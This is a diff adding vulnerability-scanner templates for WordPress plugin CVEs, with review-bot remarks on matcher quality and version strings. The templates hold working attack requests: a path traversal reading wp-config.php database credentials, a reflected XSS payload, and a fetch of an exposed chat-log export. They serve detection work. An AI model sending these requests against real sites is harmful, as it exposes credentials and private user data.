+        src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+# digest: 490a00463044022031ccf1b4c1f46397810347618011728678183100da2fbf4e931582f3f08446bd02202f1d6f5de6611bfc1c9f47b014121e13f12ae3cca0a7027b1d8da7f438c96dbf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/CVE-2022-0653-6638.yaml b/poc/cve/CVE-2022-0653-6638.yaml
new file mode 100644
index 0000000000..e06a6c604a
--- /dev/null
+++ b/poc/cve/CVE-2022-0653-6638.yaml
@@ -0,0 +1,37 @@
+id: CVE-2022-0653
+
+info:
+  name: Wordpress Profile Builder Plugin Cross-Site Scripting
+  author: dhiyaneshDk
+  severity: medium
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653
+    - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
+  tags: cve,cve2022,wordpress,xss,wp-plugin
+  description: "The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n."
+  remediation: Upgrade to version 3.6.5 or later.
+  classification:
+    cve-id: CVE-2022-0653
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'here'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/02/28
diff --git a/poc/cve/CVE-2022-27849-6740.yaml b/poc/cve/CVE-2022-27849-6740.yaml
new file mode 100644
index 0000000000..8aa1ca42b3
--- /dev/null
+++ b/poc/cve/CVE-2022-27849-6740.yaml
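Review bot: The body matcher `- 'here'` does not verify that `site_url` is reflected; any reachable `fallback-page.php` whose output contains the word "here" satisfies it together with `text/html` and status 200, so the template reports the file's presence rather than the cross-site scripting the description claims. Tying the `words:` entry to the reflected parameter value would make a match depend on the actual sink and cut false positives on patched installs. The `description:` string also ends in a stray `\n\n.`, which reads like a copy artifact, and `classification:` carries only `cve-id` while the other templates in this diff fill in `cwe-id` and the CVSS fields.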
@@ -0,0 +1,58 @@
+id: CVE-2022-27849
+
+info:
+  name: WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability
+  author: random-robbie
+  severity: high
+  description: |
+    WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or private messages.
+  remediation: |
+    Update to the latest version of the WordPress Simple Ajax Chat plugin to fix the vulnerability.
+  reference:
+    - https://wordpress.org/plugins/simple-ajax-chat/#developers
+    - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-27849
+    - https://github.com/ARPSyndicate/cvemon
+    - https://github.com/ARPSyndicate/kenzer-templates
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-27849
+    cwe-id: CWE-200
+    epss-score: 0.00713
+    epss-percentile: 0.80067
+    cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+    vendor: plugin-planet
+    product: simple_ajax_chat
+    framework: wordpress
+    google-query: inurl:/wp-content/plugins/simple-ajax-chat/
+  tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"Chat Log"'
+          - '"User IP"'
+          - '"User ID"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/csv
+
+      - type: status
+        status:
+          - 200
+# digest: 
490a0046304402200ac201e5da2db9585d76d187f6a6ede0350f1c6230c3c80676234cb41a9e8259022037d381d175e583e6490612c81f07c12a325a2dc7252ba6dcc9f5d27cc59d94d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
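Review bot: The affected-version strings disagree within this template: `name:` says `<20220116`, `description:` says `before 20220216`, and the patchstack reference URL names `20220115`. Only one of these can be the first fixed build, and the linked NVD entry should settle it; `name:` and `description:` should then carry the same value. Since the plugin uses date-stamped releases, `remediation:` could name that fixed version instead of the generic `Update to the latest version` wording.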